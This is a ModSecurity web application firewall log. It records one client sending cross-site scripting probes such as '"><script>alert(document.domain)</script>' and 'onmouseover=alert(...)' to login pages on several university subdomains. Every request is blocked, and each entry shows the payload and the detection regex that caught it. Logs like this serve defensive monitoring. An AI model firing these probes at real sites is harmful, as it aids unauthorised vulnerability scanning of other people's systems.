[Tue Aug 29 11:56:11.552595 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAq5@NgAAAAK"]
[Tue Aug 29 11:56:11.552741 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAq2KfUAAAAE"]
[Tue Aug 29 11:56:11.560671 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAocyeYAAAAR"]
[Tue Aug 29 11:56:11.574009 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAqY6ScAAAAr"]
[Tue Aug 29 11:56:11.587009 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16a8Co-f0AAAq@shcAAAAM"]
[Tue Aug 29 11:56:11.597421 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16a8Co-f0AAAqY6SgAAAAr"]
[Tue Aug 29 11:56:11.641650 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAolKz4AAAAe"]
[Tue Aug 29 11:56:11.644944 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAq3a7MAAAAI"]
[Tue Aug 29 11:56:11.651685 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAApa-UUAAAAg"]
[Tue Aug 29 11:56:11.667155 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAqeFksAAAAx"]
[Tue Aug 29 11:56:11.692772 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAAolK0AAAAAe"]
[Tue Aug 29 11:56:11.764366 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO16a8Co-f0AAArC7hUAAAAW"]
[Tue Aug 29 11:56:12.535938 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAqeFk4AAAAx"]
[Tue Aug 29 11:56:12.537527 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAApbUxcAAAAh"]
[Tue Aug 29 11:56:12.553744 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAAq@shsAAAAM"]
[Tue Aug 29 11:56:12.557661 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAApXgtIAAAAU"]
[Tue Aug 29 11:56:12.558230 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq5@N0AAAAK"]
[Tue Aug 29 11:56:12.563553 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAArB1yYAAAAV"]
[Tue Aug 29 11:56:12.563674 2023] [:error] [pid 2587] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAobUAAAAAAQ"]
[Tue Aug 29 11:56:12.657365 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16bMCo-f0AAApXgtMAAAAU"]
[Tue Aug 29 11:56:12.660170 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bMCo-f0AAAq3a7YAAAAI"]
[Tue Aug 29 11:56:12.672988 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16bMCo-f0AAApHRlgAAAAP"]
[Tue Aug 29 11:56:13.539728 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16bcCo-f0AAAqY6TAAAAAr"]
[Tue Aug 29 11:56:13.544367 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO16bcCo-f0AAAqeFlMAAAAx"]
[Tue Aug 29 11:56:13.565595 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:urll. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:urll: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/r2w/signIn.do"] [unique_id "ZO16bcCo-f0AAApHRlwAAAAP"]
